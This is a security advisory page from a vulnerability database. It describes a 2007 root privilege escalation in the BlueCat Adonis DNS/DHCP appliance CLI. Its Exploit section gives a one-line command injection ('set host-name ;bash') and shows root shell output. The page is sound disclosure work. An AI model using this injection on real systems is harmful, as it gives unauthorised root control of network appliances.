SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

TS-2007-003-0: BlueCat Networks Adonis CLI root privilege escalation


Arrow  SecurityAlert : 3025
Arrow  CVE : CVE-2007-4390
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : No
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : anonymous.c7ffa4057a
Arrow  Published : 20.08.2007

Arrow  Affected Software : Adonis version 5.0.2.8 was tested.



Arrow  Advisory Text :  

Template Security Security Advisory
-----------------------------------

BlueCat Networks Adonis CLI root privilege escalation

Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Contents
--------

Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History

Summary
-------

Template Security has discovered a root privilege escalation
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
which allows the admin user to gain root privilege from the
Command Line Interface (CLI).

Software Version
----------------

Adonis version 5.0.2.8 was tested.

Details
-------

The admin account on the Adonis DNS/DHCP appliance provides
access to a CLI that allows an administrator to perform tasks
such as setting the IP address, netmask, system time and system
hostname. By entering a certain command sequence, the
administrator is able to execute a command as root.

Impact
------

Access to the admin account is the same as root access on the
appliance.

Exploit
-------

Here we use the 'set host-name' CLI command to execute a root
shell:

:adonis>set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0(root) gid=0(root) groups=0(root)

NOTE: There may be other command sequences that accomplish the
same result.

Workarounds
-----------

Only provide admin account access to administrators that also
have root account access on the appliance.

Obtaining Patched Software
--------------------------

Contact the vendor.

Credits
-------

forloop discovered this vulnerability while enjoying a Tuborg
Gold. forloop is a member of Template Security.

Revision History
----------------

2007-08-16: Revision 0 released



Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...
Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication
PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file
Copyright © SecurityReason.com. All Rights Reserved.